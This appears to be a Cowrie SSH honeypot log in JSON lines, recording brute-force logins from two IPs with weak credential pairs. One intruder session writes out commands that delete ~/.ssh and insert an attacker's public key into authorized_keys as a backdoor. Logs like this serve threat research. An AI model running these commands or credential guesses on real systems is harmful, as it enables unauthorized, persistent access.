{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:54:39.829215Z","src_ip":"134.199.174.250","session":"83b2f9eca70e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:40.808411Z","src_ip":"134.199.174.250","session":"83b2f9eca70e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:42.108733Z","src_ip":"134.199.174.250","session":"83b2f9eca70e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33836,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb914025597","protocol":"ssh","message":"New connection: 212.227.235.229:33836 (1.2.3.4:22) [session: ecb914025597]","sensor":"my-vps","timestamp":"2025-09-08T12:55:05.350381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:05.351295Z","src_ip":"212.227.235.229","session":"ecb914025597"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:05.477476Z","src_ip":"212.227.235.229","session":"ecb914025597"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"testnet","message":"login attempt [testnet/testnet] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:06.020076Z","src_ip":"212.227.235.229","session":"ecb914025597"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:07.148470Z","src_ip":"212.227.235.229","session":"ecb914025597"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40428,"dst_ip":"1.2.3.4","dst_port":22,"session":"d524595a7354","protocol":"ssh","message":"New connection: 134.199.174.250:40428 (1.2.3.4:22) [session: d524595a7354]","sensor":"my-vps","timestamp":"2025-09-08T12:55:09.956303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:55:10.088068Z","src_ip":"134.199.174.250","session":"d524595a7354"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:55:10.290350Z","src_ip":"134.199.174.250","session":"d524595a7354"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:11.573536Z","src_ip":"134.199.174.250","session":"d524595a7354"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:12.874044Z","src_ip":"134.199.174.250","session":"d524595a7354"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43344,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1fef914bb05","protocol":"ssh","message":"New connection: 212.227.235.229:43344 (1.2.3.4:22) [session: e1fef914bb05]","sensor":"my-vps","timestamp":"2025-09-08T12:55:16.156083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:16.157140Z","src_ip":"212.227.235.229","session":"e1fef914bb05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:16.425148Z","src_ip":"212.227.235.229","session":"e1fef914bb05"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"password123","message":"login attempt [ahmad/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:17.538214Z","src_ip":"212.227.235.229","session":"e1fef914bb05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39016,"dst_ip":"1.2.3.4","dst_port":22,"session":"40a25784a526","protocol":"ssh","message":"New connection: 212.227.235.229:39016 (1.2.3.4:22) [session: 40a25784a526]","sensor":"my-vps","timestamp":"2025-09-08T12:55:17.677026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:17.678071Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:17.856993Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.login.success","username":"root","password":"p0o9i8u7","message":"login attempt [root/p0o9i8u7] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:55:18.585455Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:18.808560Z","src_ip":"212.227.235.229","session":"e1fef914bb05"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:55:18.946054Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:55:18.946864Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:55:18.947710Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.121230Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:55:19.568508Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.569502Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.744347Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.745579Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39022,"dst_ip":"1.2.3.4","dst_port":22,"session":"d11df5b2099d","protocol":"ssh","message":"New connection: 212.227.235.229:39022 (1.2.3.4:22) [session: d11df5b2099d]","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.917304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:19.918216Z","src_ip":"212.227.235.229","session":"d11df5b2099d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:20.092532Z","src_ip":"212.227.235.229","session":"d11df5b2099d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:20.811240Z","src_ip":"212.227.235.229","session":"d11df5b2099d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:21.983240Z","src_ip":"212.227.235.229","session":"d11df5b2099d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39024,"dst_ip":"1.2.3.4","dst_port":22,"session":"a19565212f07","protocol":"ssh","message":"New connection: 212.227.235.229:39024 (1.2.3.4:22) [session: a19565212f07]","sensor":"my-vps","timestamp":"2025-09-08T12:55:22.134068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:22.135044Z","src_ip":"212.227.235.229","session":"a19565212f07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:22.292760Z","src_ip":"212.227.235.229","session":"a19565212f07"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:55:22.966498Z","src_ip":"212.227.235.229","session":"a19565212f07"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:23.125681Z","src_ip":"212.227.235.229","session":"a19565212f07"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:23.133836Z","src_ip":"212.227.235.229","session":"40a25784a526"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36172,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c611f90c1b5","protocol":"ssh","message":"New connection: 212.227.235.229:36172 (1.2.3.4:22) [session: 8c611f90c1b5]","sensor":"my-vps","timestamp":"2025-09-08T12:55:29.956710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:29.957592Z","src_ip":"212.227.235.229","session":"8c611f90c1b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:30.248677Z","src_ip":"212.227.235.229","session":"8c611f90c1b5"}
{"eventid":"cowrie.login.failed","username":"client","password":"password123","message":"login attempt [client/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:31.458347Z","src_ip":"212.227.235.229","session":"8c611f90c1b5"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:32.755299Z","src_ip":"212.227.235.229","session":"8c611f90c1b5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52360,"dst_ip":"1.2.3.4","dst_port":22,"session":"9039523422ab","protocol":"ssh","message":"New connection: 134.199.174.250:52360 (1.2.3.4:22) [session: 9039523422ab]","sensor":"my-vps","timestamp":"2025-09-08T12:55:40.468266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:55:40.470370Z","src_ip":"134.199.174.250","session":"9039523422ab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:55:40.877783Z","src_ip":"134.199.174.250","session":"9039523422ab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T12:55:42.100931Z","src_ip":"134.199.174.250","session":"9039523422ab"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:43.491152Z","src_ip":"134.199.174.250","session":"9039523422ab"}
